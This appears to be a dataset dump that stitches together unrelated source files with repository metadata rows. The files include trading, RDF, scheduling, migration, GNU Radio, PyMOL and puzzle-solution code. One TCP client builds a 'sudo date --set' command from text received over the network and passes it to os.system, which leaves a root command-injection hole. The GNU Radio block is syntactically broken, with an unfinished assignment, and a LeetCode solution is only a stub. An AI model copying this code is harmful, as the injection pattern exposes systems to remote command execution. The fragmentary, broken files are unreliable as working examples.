assert sorted(loss.keys()) == sorted(blend_config.keys()), '{} {}'.format(loss.keys(), blend_config.keys())
sum_loss = None
for key in sorted(loss.keys()):
blend = blend_config[key]
if blend == 0.0:
continue
l = loss[key] * blend_config[key]
if sum_loss is None:
sum_loss = l
else:
sum_loss += l
return sum_loss
def should_compute(self, key: str):
return key in self.config.blend['main']
def get_loss_names(self):
return ['sum_loss'] + list(self.config.blend['main'].keys())
@abstractmethod
def forward(self, *args, **kwargs):
pass
@abstractmethod
def make_loss(self, outputs, target):
pass
@abstractmethod
def sum_loss(self, loss):
pass
@abstractmethod
def test(self, *args, **kwargs):
pass
|
[
"kazuyuki_hiroshiba@dwango.co.jp"
] |
kazuyuki_hiroshiba@dwango.co.jp
|
bf77468ee650a613d6bf14b965954b3156f6dfcd
|
f70d11f54732808c4ed40886bdd57bbdca6542eb
|
/pyalgotrade/tools/resample.py
|
a8a8ae23b99fed15d20a792c88399406d61cf367
|
[
"Apache-2.0"
] |
permissive
|
stephenagyeman/pyalgotrade
|
1aa4c22b20c707791c5e81ad1bdfb8fb55c8d542
|
a783b8da8c63a1fc25a4bdee560d4c5a6e0c1a8c
|
refs/heads/master
| 2021-01-15T12:03:16.370138
| 2014-01-14T02:15:41
| 2014-01-14T02:15:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,927
|
py
|
# PyAlgoTrade
#
# Copyright 2011-2013 Gabriel Martin Becedillas Ruiz
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. moduleauthor:: Gabriel Martin Becedillas Ruiz <gabriel.becedillas@gmail.com>
"""
import os
from pyalgotrade import observer
from pyalgotrade.dataseries import resampled
datetime_format = "%Y-%m-%d %H:%M:%S"
class CSVFileWriter(object):
def __init__(self, csvFile):
self.__file = open(csvFile, "w")
self.__writeLine("Date Time", "Open", "High", "Low", "Close", "Volume", "Adj Close")
def __writeLine(self, *values):
line = ",".join([str(value) for value in values])
self.__file.write(line)
self.__file.write(os.linesep)
def writeSlot(self, slot):
adjClose = slot.getAdjClose()
if adjClose is None:
adjClose = ""
dateTime = slot.getDateTime().strftime(datetime_format)
self.__writeLine(dateTime, slot.getOpen(), slot.getHigh(), slot.getLow(), slot.getClose(), slot.getVolume(), adjClose)
def close(self):
self.__file.close()
class Sampler(object):
def __init__(self, barFeed, frequency, csvFile):
instruments = barFeed.getRegisteredInstruments()
if len(instruments) != 1:
raise Exception("Only barfeeds with 1 instrument can be resampled")
barFeed.getNewBarsEvent().subscribe(self.__onBars)
self.__barFeed = barFeed
self.__frequency = frequency
self.__instrument = instruments[0]
self.__slot = None
self.__writer = CSVFileWriter(csvFile)
def __onBars(self, dateTime, bars):
slotDateTime = resampled.get_slot_datetime(dateTime, self.__frequency)
bar = bars[self.__instrument]
if self.__slot is None:
self.__slot = resampled.Slot(slotDateTime, bar)
elif self.__slot.getDateTime() == slotDateTime:
self.__slot.addBar(bar)
else:
self.__writer.writeSlot(self.__slot)
self.__slot = resampled.Slot(slotDateTime, bar)
def finish(self):
if self.__slot is not None:
self.__writer.writeSlot(self.__slot)
self.__writer.close()
def resample_impl(barFeed, frequency, csvFile):
sampler = Sampler(barFeed, frequency, csvFile)
# Process all bars.
disp = observer.Dispatcher()
disp.addSubject(barFeed)
disp.run()
sampler.finish()
def resample_to_csv(barFeed, frequency, csvFile):
"""Resample a BarFeed into a CSV file grouping bars by a certain frequency.
The resulting file can be loaded using :class:`pyalgotrade.barfeed.csvfeed.GenericBarFeed`.
The CSV file will have the following format:
::
Date Time,Open,High,Low,Close,Volume,Adj Close
2013-01-01 00:00:00,13.51001,13.56,13.51,13.56,273.88014126,13.51001
:param barFeed: The bar feed that will provide the bars. It should only hold bars from a single instrument.
:type barFeed: :class:`pyalgotrade.barfeed.BarFeed`
:param frequency: The grouping frequency in seconds. Must be > 0.
:param csvFile: The path to the CSV file to write.
:type csvFile: string.
.. note::
* Datetimes are stored without timezone information.
* **Adj Close** column may be empty if the input bar feed doesn't have that info.
"""
if frequency > 0:
resample_impl(barFeed, frequency, csvFile)
else:
raise Exception("Invalid frequency")
|
[
"gabo@Gabriels-MacBook.local"
] |
gabo@Gabriels-MacBook.local
|
ac862313a9b98f5a1267b8153262f40789aaf7b9
|
5c900c1801e73aad21a90e97d73e8f10c9f31129
|
/src/02_convert_xlsx_to_rdf.py
|
631659e6768279523bbd07ac609632d3d0d969fd
|
[
"Apache-2.0"
] |
permissive
|
utda/kunshujo
|
024ea7bb1016ba28ae17632ad5e998203bab16fa
|
fbae79171dfd017a47a89bcb18d7862711f0689f
|
refs/heads/master
| 2022-09-11T12:09:23.438408
| 2022-08-31T05:19:52
| 2022-08-31T05:19:52
| 156,177,231
| 0
| 1
|
Apache-2.0
| 2022-08-31T05:20:36
| 2018-11-05T07:27:44
|
Python
|
UTF-8
|
Python
| false
| false
| 1,685
|
py
|
import pandas as pd
from rdflib import URIRef, BNode, Literal, Graph
from rdflib.namespace import RDF, RDFS, FOAF, XSD
from rdflib import Namespace
import numpy as np
import math
import sys
import argparse
import json
def parse_args(args=sys.argv[1:]):
""" Get the parsed arguments specified on this script.
"""
parser = argparse.ArgumentParser(description="")
parser.add_argument(
'path',
action='store',
type=str,
help='Ful path.')
return parser.parse_args(args)
args = parse_args()
path = args.path
g = Graph()
df = pd.read_excel(path, sheet_name=0, header=None, index_col=None)
r_count = len(df.index)
c_count = len(df.columns)
map = {}
for i in range(1, c_count):
label = df.iloc[0, i]
uri = df.iloc[1, i]
type = df.iloc[2, i]
if not pd.isnull(type):
obj = {}
map[i] = obj
obj["label"] = label
obj["uri"] = uri
obj["type"] = type
for j in range(3, r_count):
subject = df.iloc[j,0]
subject = URIRef(subject)
for i in map:
value = df.iloc[j,i]
if not pd.isnull(value) and value != 0:
obj = map[i]
p = URIRef(obj["uri"])
if obj["type"].upper() == "RESOURCE":
g.add((subject, p, URIRef(value)))
else:
g.add((subject, p, Literal(value)))
g.serialize(destination=path+'.rdf')
json_path = path+'.json'
f2 = open(json_path, "wb")
f2.write(g.serialize(format='json-ld'))
f2.close()
with open(json_path) as f:
df = json.load(f)
with open(path+"_min.json", 'w') as f:
json.dump(df, f, ensure_ascii=False, sort_keys=True, separators=(',', ': '))
|
[
"na.kamura.1263@gmail.com"
] |
na.kamura.1263@gmail.com
|
c346eb614b07d36c5320bc514531a1b812e3e811
|
600df3590cce1fe49b9a96e9ca5b5242884a2a70
|
/v8/tools/testrunner/local/pool_unittest.py
|
335d20a6bf9a71a8efd476cc4b67aa83e812b801
|
[
"BSD-3-Clause",
"SunPro",
"bzip2-1.0.6"
] |
permissive
|
metux/chromium-suckless
|
efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a
|
72a05af97787001756bae2511b7985e61498c965
|
refs/heads/orig
| 2022-12-04T23:53:58.681218
| 2017-04-30T10:59:06
| 2017-04-30T23:35:58
| 89,884,931
| 5
| 3
|
BSD-3-Clause
| 2022-11-23T20:52:53
| 2017-05-01T00:09:08
| null |
UTF-8
|
Python
| false
| false
| 1,252
|
py
|
#!/usr/bin/env python
# Copyright 2014 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from pool import Pool
def Run(x):
if x == 10:
raise Exception("Expected exception triggered by test.")
return x
class PoolTest(unittest.TestCase):
def testNormal(self):
results = set()
pool = Pool(3)
for result in pool.imap_unordered(Run, [[x] for x in range(0, 10)]):
results.add(result.value)
self.assertEquals(set(range(0, 10)), results)
def testException(self):
results = set()
pool = Pool(3)
for result in pool.imap_unordered(Run, [[x] for x in range(0, 12)]):
# Item 10 will not appear in results due to an internal exception.
results.add(result.value)
expect = set(range(0, 12))
expect.remove(10)
self.assertEquals(expect, results)
def testAdd(self):
results = set()
pool = Pool(3)
for result in pool.imap_unordered(Run, [[x] for x in range(0, 10)]):
results.add(result.value)
if result.value < 30:
pool.add([result.value + 20])
self.assertEquals(set(range(0, 10) + range(20, 30) + range(40, 50)),
results)
|
[
"enrico.weigelt@gr13.net"
] |
enrico.weigelt@gr13.net
|
5a40aaec7aacb3d61f3c59a5a873c57e5c626c01
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02630/s691363854.py
|
db496ce9e82c844b6fd645661f57cc1b9cd4e228
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 322
|
py
|
from collections import defaultdict
N = int(input())
A = list(map(int, input().split()))
Q = int(input())
d = defaultdict(int)
ans = 0
for a in A:
ans += a
d[a] += 1
for _ in range(Q):
b, c = map(int, input().split())
n = d[b]
ans -= n * b
ans += n * c
print(ans)
d[b] = 0
d[c] += n
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
fb7272b01c3d2d1856ab5326a9e09a3f548ce4b6
|
757b100c2689f61dbd140672fc10059938bda603
|
/SportsSimulation/sportsSchedule_algo.py
|
9d1b323bee878638324f1f70b3030fefd4325dac
|
[] |
no_license
|
tbkrft567/Portfolio
|
089d8d94d735bbb757eb61688c515f9f25451595
|
bbe514905a734e14c0bda5579928fdc9dad5a69e
|
refs/heads/master
| 2023-03-15T23:02:01.640998
| 2021-02-21T21:32:44
| 2021-02-21T21:32:44
| 231,143,663
| 0
| 0
| null | 2023-03-08T20:27:46
| 2019-12-31T20:31:56
|
HTML
|
UTF-8
|
Python
| false
| false
| 3,531
|
py
|
def generateSchedule(numOfTeams):
scheduleGrid = []
weeklyGrid = []
for x in range(numOfTeams): # Create a grid for all matches to be played
scheduleGrid.append([])
weeklyGrid.append([])
allMatches = []
for home in range(1, numOfTeams+1): # Insert all matches to be played
for away in range(1, numOfTeams+1):
allMatches.append([home, away])
match = 0
team = 1
for x in range(len(scheduleGrid)):
while match < len(allMatches):
if allMatches[match][0] != team and scheduleGrid[x][len(scheduleGrid) - 1] != None:
break
if allMatches[match][0] != allMatches[match][1]:
scheduleGrid[x].append(allMatches[match])
weeklyGrid[x].append([])
else:
scheduleGrid[x].append(None)
weeklyGrid[x].append([])
match += 1
team += 1
matchesToPlay = pow(numOfTeams, 2) - numOfTeams
matchesPerWeek = int(numOfTeams / 2)
weeks = int(matchesToPlay / matchesPerWeek)
for nullValue in range(numOfTeams):
weeklyGrid[nullValue][nullValue].append(None)
x = 0
for weekCount in range(1, int(weeks)+1):
for row in range(len(weeklyGrid)):
for col in range(len(weeklyGrid[row])):
if row == col:
continue
rowTotal = 0
for tempCol in range(numOfTeams):
if len(weeklyGrid[row][tempCol]) != 0 and weeklyGrid[row][tempCol][0] != None:
rowTotal += 1
colTotal = 0
for tempRow in range(numOfTeams):
if len(weeklyGrid[tempRow][col]) != 0 and weeklyGrid[tempRow][col][0] != None:
colTotal += 1
if rowTotal == weekCount:
break
if colTotal == weekCount:
continue
if row > col:
continue
if len(weeklyGrid[row][col]) == 0:
weeklyGrid[row][col].append(weekCount)
weeklyGrid[col][row].append(
int(weekCount + ((pow(numOfTeams, 2) - numOfTeams) / (numOfTeams / 2) / 2)))
break
for homeTeam in range(numOfTeams):
for awayTeam in range(numOfTeams):
if scheduleGrid[homeTeam][awayTeam] == None:
continue
scheduleGrid[homeTeam][awayTeam].append(weeklyGrid[homeTeam][awayTeam][0])
leagueSchedule = []
for weekCount in range(1, weeks+1):
matchesConfirmed = 0
for homeTeam in range(numOfTeams): #Row
for awayTeam in range(numOfTeams): #Col
if scheduleGrid[homeTeam][awayTeam] != None:
if scheduleGrid[homeTeam][awayTeam][2] == weekCount:
leagueSchedule.append(scheduleGrid[homeTeam][awayTeam])
matchesConfirmed += 1
#if scheduleGrid[homeTeam][awayTeam][0] or [1] == homeTeam break awayTeam FOR
if scheduleGrid[homeTeam][awayTeam][0] == homeTeam+1 or scheduleGrid[homeTeam][awayTeam][1] == homeTeam+1:
break
if matchesConfirmed == matchesPerWeek:
break
if matchesConfirmed == matchesPerWeek:
break
return leagueSchedule
numOfTeams = 16
Schedule = generateSchedule(numOfTeams)
print(len(Schedule))
|
[
"tbkrft@gmail.com"
] |
tbkrft@gmail.com
|
4e4eae80ffa5c9109129d78b060c7b96e3479ca3
|
656c384011734403e60a205ffa44bd7a494ebaff
|
/migrations/versions/b509892e3432_.py
|
cb902f6cd5fb52b8c0f7e01248c8f702bfafe762
|
[] |
no_license
|
jreiher2003/Composite
|
cf721737917b3b50f83f7bc8790804f35de82797
|
3547b0ec8568d2212a530b14ccf358acf2e6bec3
|
refs/heads/master
| 2021-01-21T04:47:25.694869
| 2016-07-22T21:38:20
| 2016-07-22T21:38:20
| 53,373,294
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 764
|
py
|
"""empty message
Revision ID: b509892e3432
Revises: None
Create Date: 2016-07-21 17:53:01.499715
"""
# revision identifiers, used by Alembic.
revision = 'b509892e3432'
down_revision = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('users',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('username', sa.String(), nullable=True),
sa.Column('password', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('username')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('users')
### end Alembic commands ###
|
[
"jreiher2003@yahoo.com"
] |
jreiher2003@yahoo.com
|
68f198e20b5cf9bd2d0f06bd412da9e1b1e528ef
|
568da13e0f0bfc3276508d67b020adea04f3036a
|
/final/170401067/tcpI.py
|
ccf2b2f4734d1f601b25d25fb5169fdd6b13e16d
|
[
"Unlicense"
] |
permissive
|
BaranAkcakaya/blm304
|
75a6be14afb0d9a012d17c56bd1e5ad5abe03630
|
3bca2b2520e673d15c0667418789903b119b9170
|
refs/heads/master
| 2022-10-15T21:04:49.367816
| 2020-06-08T12:34:02
| 2020-06-08T12:34:02
| 267,668,790
| 0
| 0
|
Unlicense
| 2020-06-07T13:36:48
| 2020-05-28T18:42:21
|
Python
|
UTF-8
|
Python
| false
| false
| 889
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 3 22:26:03 2020
@author: EnesNK
"""
import socket
import os
# Socket oluşturulması
s = socket.socket()
# Bağlanılacak adres ve port
host = "192.168.1.32"
port = 142
try:
# Bağlantıyı yap
komut = 'sudo date --set="'
s.connect((host, port))
# serverden yanıtı al
yanit = s.recv(1024)
print(yanit.decode("utf-8"))
s.send(yanit) #yanki yolla
# bağlantıyı kapat
komut = komut + s.recv(1024).decode() + '"' #gerekli terminal komutun hazırlanması
print(komut)
zamandilimi = s.recv(1024)
print(zamandilimi.decode())
os.system(komut) #komutun çalıştırılması
s.close()
except socket.error as msg:
print("[Server aktif değil.] Mesaj:", msg)
|
[
"noreply@github.com"
] |
BaranAkcakaya.noreply@github.com
|
c0e643ad4fa8ef59d8fc7c410dae20ba6ce83e43
|
6223dc2e5de7921696cb34fb62142fd4a4efe361
|
/.metadata/.plugins/org.eclipse.core.resources/.history/73/60f8cf3a196b00141928c597445b4e35
|
cc1d592056af8a6b636607c3a5fc66693511d529
|
[] |
no_license
|
Mushirahmed/python_workspace
|
5ef477b2688e8c25b1372f546752501ee53d93e5
|
46e2ed783b17450aba29e4e2df7b656522b2b03b
|
refs/heads/master
| 2021-03-12T19:24:50.598982
| 2015-05-25T10:23:54
| 2015-05-25T10:23:54
| 24,671,376
| 0
| 1
| null | 2015-02-06T09:27:40
| 2014-10-01T08:40:33
|
Python
|
UTF-8
|
Python
| false
| false
| 5,406
|
#!/usr/bin/env python
#
# Copyright 2014 <+YOU OR YOUR COMPANY+>.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
import numpy
#from operator import add
#import copy
#from gnuradio import gr
import gras
class expo(gras.Block):
"""
docstring for block expo
"""
def __init__(self):
gras.Block.__init__(self,
name="expo",
in_sig=[numpy.float32],
out_sig=[numpy.float32])
def set_parameters(self,g,a,b):
self.gama=g
self.alpha=a
self.beta=b
def yield_times(self):
from datetime import date, time, datetime, timedelta
start = datetime.combine(date.today(), time(0, 0))
yield start.strftime("%S")
while True:
start += timedelta(seconds=0.5)
yield start.strftime("%S")
def work(self, input_items, output_items):
#in0 = input_items[0]
#out = output_items[0]
tmrg = []
o1 = []
o2 = []
o3 = []
ans = []
final_output = []
gen = self.yield_times()
for ii in range(20):
tmrg.append(gen.next())
# print "tmrg :",tmrg
"""for i1 in range(0,10):
o1.append((self.gama)/(self.alpha*self.beta))
print "o1 : ", o1
for i2 in range(0,10):
o2.append(((self.gama)*(-numpy.exp(self.alpha)))/(self.alpha*(self.beta-self.alpha)))
print "o2 : ",o2
for i3 in range(0,10):
o3.append(((self.gama)*(-numpy.exp(self.beta)))/(self.beta*(self.alpha-self.beta)))
print "o3 : ",o3
#ans.append(o1+o2+o3)
for i in range(0,10):
ans.append(list(numpy.array(o1[i])+numpy.array(o2[i])+numpy.array(o3[i])))
print "Final Ans : ",ans
print "Type out : ",type(out)
print "Type ans :",type(ans)
out = copy.copy(ans)
#out[0:1] = ans
print "Output is : " ,out
self.consume(0,1)
self.produce(0,1)"""
#o1.append((self.gama)/(self.alpha*self.beta))
#print "o1 : ", o1
for i in range(0,20):
o1.append((self.gama)/(self.alpha*self.beta))
print "o1 : ", o1[i]
o2.append(((self.gama)*(numpy.exp(-(self.alpha*i)))/(self.alpha*(self.beta-self.alpha))))
print "o2 : ",o2[i]
o3.append(((self.gama)*(numpy.exp(-(self.beta*i)))/(self.beta*(self.alpha-self.beta))))
print "o3 : ",o3[i]
ans.append(o1[i]+o2[i]+o3[i])
print "Final Ans : ",ans
"""for i in range(0,len(ans)):
#out = copy.copy(ans[i])
#out[0:1] = ans
#print "Output is : " ,out"""
"""for i1 in range(0,len(ans)):
final_output.append(o1+ans[i1])
print "Final OutPut : ", final_output"""
#for i1 in range(0,len(ans)):
#out[0] = ans[i1]
#print "Output Sent : ", output_items[i1]
#out[:len(final_output)] = copy.copy(final_output)
for i in range(0,20):
a =
output_items [0] [:1] = a
self.consume(0,1)
self.produce(0,1)
"""result = []
for i in range(0,20):
result.append(numpy.exp(i))
print "Result : ",result
out[0] = result
self.consume(0,1)
self.produce(0,1) """
#o2 = -numpy.exp(-2*in0[0:1])
#o3 = -numpy.exp(-3*in0[0:1])
#o2=numpy.exp(-(in0[0:1]*self.alpha))
#print("o2 :",o2)
#o3=numpy.sin((self.freq*in0[0:1])+(self.sigma))
#print("o3 :",o3)
#o4=numpy.sqrt(o1-numpy.square(self.zita))
#print("o4 :",o4)
"""ans = o1-(mul/o4)
#ans.append(o1-((numpy.exp(-in0[0:1]*self.sigma)*(numpy.sin((self.freq*in0[0:1])+(self.sigma))))/numpy.sqrt(o1-numpy.square(self.zita))))
print("Final Value : ",ans)
out[0:1] = ans"""
#o2 = -numpy.exp(-2*tmrg)
#o3 = -numpy.exp(-3*in0[0:1])
#o2 = numpy.exp(-in0[0:1]*self.alpha)
#o3 = numpy.exp(-in0[0:1]*self.beta)
#o4 = numpy.sqrt(1-numpy.square(self.alpha))
#ans = 1-((o2*o3)/o4)
#ans.append(o2)
#ans.append(o1-((numpy.exp(-in0[0:1]*self.sigma)*(numpy.sin((self.freq*in0[0:1])+(self.sigma))))/numpy.sqrt(o1-numpy.square(self.zita))))
#print("Final Value : ",ans)
#out[0:1] = ans
#out = copy.copy(ans)
#self.consume(0,1)
#self.produce(0,1)
#return len(output_items[0])
|
[
"imushir@gmail.com"
] |
imushir@gmail.com
|
|
923a73b286091e48661d2498f48f73f6650f64ed
|
e35fd52fe4367320024a26f2ee357755b5d5f4bd
|
/leetcode/problems/74.search-a-2d-matrix.py
|
1569ac34b90c9406f662f03ef22de36da49b9a0d
|
[] |
no_license
|
liseyko/CtCI
|
a451967b0a0ce108c491d30b81e88d20ad84d2cd
|
c27f19fac14b4acef8c631ad5569e1a5c29e9e1f
|
refs/heads/master
| 2020-03-21T14:28:47.621481
| 2019-11-12T22:59:07
| 2019-11-12T22:59:07
| 138,658,372
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 966
|
py
|
#
# @lc app=leetcode id=74 lang=python3
#
# [74] Search a 2D Matrix
#
# https://leetcode.com/problems/search-a-2d-matrix/description/
#
# algorithms
# Medium (35.49%)
# Total Accepted: 262.2K
# Total Submissions: 738.7K
# Testcase Example: '[[1,3,5,7],[10,11,16,20],[23,30,34,50]]\n3'
#
# Write an efficient algorithm that searches for a value in an m x n matrix.
# This matrix has the following properties:
#
#
# Integers in each row are sorted from left to right.
# The first integer of each row is greater than the last integer of the
# previous row.
#
#
# Example 1:
#
#
# Input:
# matrix = [
# [1, 3, 5, 7],
# [10, 11, 16, 20],
# [23, 30, 34, 50]
# ]
# target = 3
# Output: true
#
#
# Example 2:
#
#
# Input:
# matrix = [
# [1, 3, 5, 7],
# [10, 11, 16, 20],
# [23, 30, 34, 50]
# ]
# target = 13
# Output: false
#
#
class Solution:
def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:
|
[
"liseyko@gmail.com"
] |
liseyko@gmail.com
|
ca3cd643be45c6a9a5f944743ece02ac4fc85764
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_53/567.py
|
05e6ad00cbf4b7bba63051f353ec913a4811d281
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 403
|
py
|
#!/usr/bin/python
import sys
def snapper(n,k):
return ( ( k & ( (1<<n) - 1) ) == ( (1<<n) - 1) )
num_entries = input()
entries = []
c = 0
while c < num_entries:
s = sys.stdin.readline()
entries.append(map(int, s.split(' ')))
c += 1
c = 0
while c < num_entries:
if snapper(entries[c][0], entries[c][1]):
print "Case #" + str(c+1) + ": ON"
else:
print "Case #" + str(c+1) + ": OFF"
c += 1
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
ddeea8ef6ffc46729b0a8139f950b546b159e1ae
|
91fe4b06b331be287518731614067e5d65a85e82
|
/GetNearestAgents/GetNearestAgents/urls.py
|
a01a6b849148b911ca3a3fc6124c09c422da1e18
|
[] |
no_license
|
Niharika3128/GetAgentsByNearestLocations
|
e8b1af4dc011efb4ff0e79383478333747ff2a22
|
9e954344e50a3f92d40fd3aa7810569c727f0c46
|
refs/heads/master
| 2022-12-16T04:57:45.667615
| 2020-09-11T18:32:59
| 2020-09-11T18:32:59
| 294,387,893
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,066
|
py
|
"""GetNearestAgents URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# from django.contrib import admin
from django.urls import path
from agents import views
from django.views.generic import TemplateView
urlpatterns = [
# path('admin/', admin.site.urls),
path('',TemplateView.as_view(template_name='home.html'),name='main'),
path('locations/',views.getNearestLocations,name='locations'),
path('get_page/(?P<pno>\d+)/(?P<id>\d)/',views.getNearestLocations,name='get_page'),
]
|
[
"niharika5475@gmail.com"
] |
niharika5475@gmail.com
|
3edaba52aa526852e5576903a2ca6d968a293149
|
18305efd1edeb68db69880e03411df37fc83b58b
|
/pdb_files_1000rot/qp/1qpe/tractability_500/pymol_results_file.py
|
ba2530e6b7d97a0245b21db20af8a6d3f359eb47
|
[] |
no_license
|
Cradoux/hotspot_pipline
|
22e604974c8e38c9ffa979092267a77c6e1dc458
|
88f7fab8611ebf67334474c6e9ea8fc5e52d27da
|
refs/heads/master
| 2021-11-03T16:21:12.837229
| 2019-03-28T08:31:39
| 2019-03-28T08:31:39
| 170,106,739
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,204
|
py
|
from os.path import join
import tempfile
import zipfile
from pymol import cmd, finish_launching
from pymol.cgo import *
finish_launching()
dirpath = None
def cgo_arrow(atom1='pk1', atom2='pk2', radius=0.07, gap=0.0, hlength=-1, hradius=-1, color='blue red', name=''):
from chempy import cpv
radius, gap = float(radius), float(gap)
hlength, hradius = float(hlength), float(hradius)
try:
color1, color2 = color.split()
except:
color1 = color2 = color
color1 = list(cmd.get_color_tuple(color1))
color2 = list(cmd.get_color_tuple(color2))
def get_coord(v):
if not isinstance(v, str):
return v
if v.startswith('['):
return cmd.safe_list_eval(v)
return cmd.get_atom_coords(v)
xyz1 = get_coord(atom1)
xyz2 = get_coord(atom2)
normal = cpv.normalize(cpv.sub(xyz1, xyz2))
if hlength < 0:
hlength = radius * 3.0
if hradius < 0:
hradius = hlength * 0.6
if gap:
diff = cpv.scale(normal, gap)
xyz1 = cpv.sub(xyz1, diff)
xyz2 = cpv.add(xyz2, diff)
xyz3 = cpv.add(cpv.scale(normal, hlength), xyz2)
obj = [cgo.CYLINDER] + xyz1 + xyz3 + [radius] + color1 + color2 + [cgo.CONE] + xyz3 + xyz2 + [hradius, 0.0] + color2 + color2 + [1.0, 0.0]
return obj
dirpath = tempfile.mkdtemp()
zip_dir = 'out.zip'
with zipfile.ZipFile(zip_dir) as hs_zip:
hs_zip.extractall(dirpath)
cmd.load(join(dirpath,"protein.pdb"), "protein")
cmd.show("cartoon", "protein")
if dirpath:
f = join(dirpath, "label_threshold_10.mol2")
else:
f = "label_threshold_10.mol2"
cmd.load(f, 'label_threshold_10')
cmd.hide('everything', 'label_threshold_10')
cmd.label("label_threshold_10", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
if dirpath:
f = join(dirpath, "label_threshold_14.mol2")
else:
f = "label_threshold_14.mol2"
cmd.load(f, 'label_threshold_14')
cmd.hide('everything', 'label_threshold_14')
cmd.label("label_threshold_14", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
if dirpath:
f = join(dirpath, "label_threshold_17.mol2")
else:
f = "label_threshold_17.mol2"
cmd.load(f, 'label_threshold_17')
cmd.hide('everything', 'label_threshold_17')
cmd.label("label_threshold_17", "name")
cmd.set("label_font_id", 7)
cmd.set("label_size", -0.4)
colour_dict = {'acceptor':'red', 'donor':'blue', 'apolar':'yellow', 'negative':'purple', 'positive':'cyan'}
threshold_list = [10, 14, 17]
gfiles = ['donor.grd', 'apolar.grd', 'acceptor.grd']
grids = ['donor', 'apolar', 'acceptor']
num = 0
surf_transparency = 0.2
if dirpath:
gfiles = [join(dirpath, g) for g in gfiles]
for t in threshold_list:
for i in range(len(grids)):
try:
cmd.load(r'%s'%(gfiles[i]), '%s_%s'%(grids[i], str(num)))
cmd.isosurface('surface_%s_%s_%s'%(grids[i], t, num), '%s_%s'%(grids[i], num), t)
cmd.set('transparency', surf_transparency, 'surface_%s_%s_%s'%(grids[i], t, num))
cmd.color(colour_dict['%s'%(grids[i])], 'surface_%s_%s_%s'%(grids[i], t, num))
cmd.group('threshold_%s'%(t), members = 'surface_%s_%s_%s'%(grids[i],t, num))
cmd.group('threshold_%s' % (t), members='label_threshold_%s' % (t))
except:
continue
try:
cmd.group('hotspot_%s' % (num), members='threshold_%s' % (t))
except:
continue
for g in grids:
cmd.group('hotspot_%s' % (num), members='%s_%s' % (g,num))
cluster_dict = {"16.1944999695":[], "16.1944999695_arrows":[]}
cluster_dict["16.1944999695"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(18.0), float(37.5), float(84.5), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([18.0,37.5,84.5], [16.732,39.933,86.734], color="blue red", name="Arrows_16.1944999695_1")
cluster_dict["16.1944999695"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(21.0), float(34.0), float(86.0), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([21.0,34.0,86.0], [20.128,33.403,83.414], color="blue red", name="Arrows_16.1944999695_2")
cluster_dict["16.1944999695"] += [COLOR, 0.00, 0.00, 1.00] + [ALPHA, 0.6] + [SPHERE, float(22.0), float(35.0), float(82.5), float(1.0)]
cluster_dict["16.1944999695_arrows"] += cgo_arrow([22.0,35.0,82.5], [20.128,33.403,83.414], color="blue red", name="Arrows_16.1944999695_3")
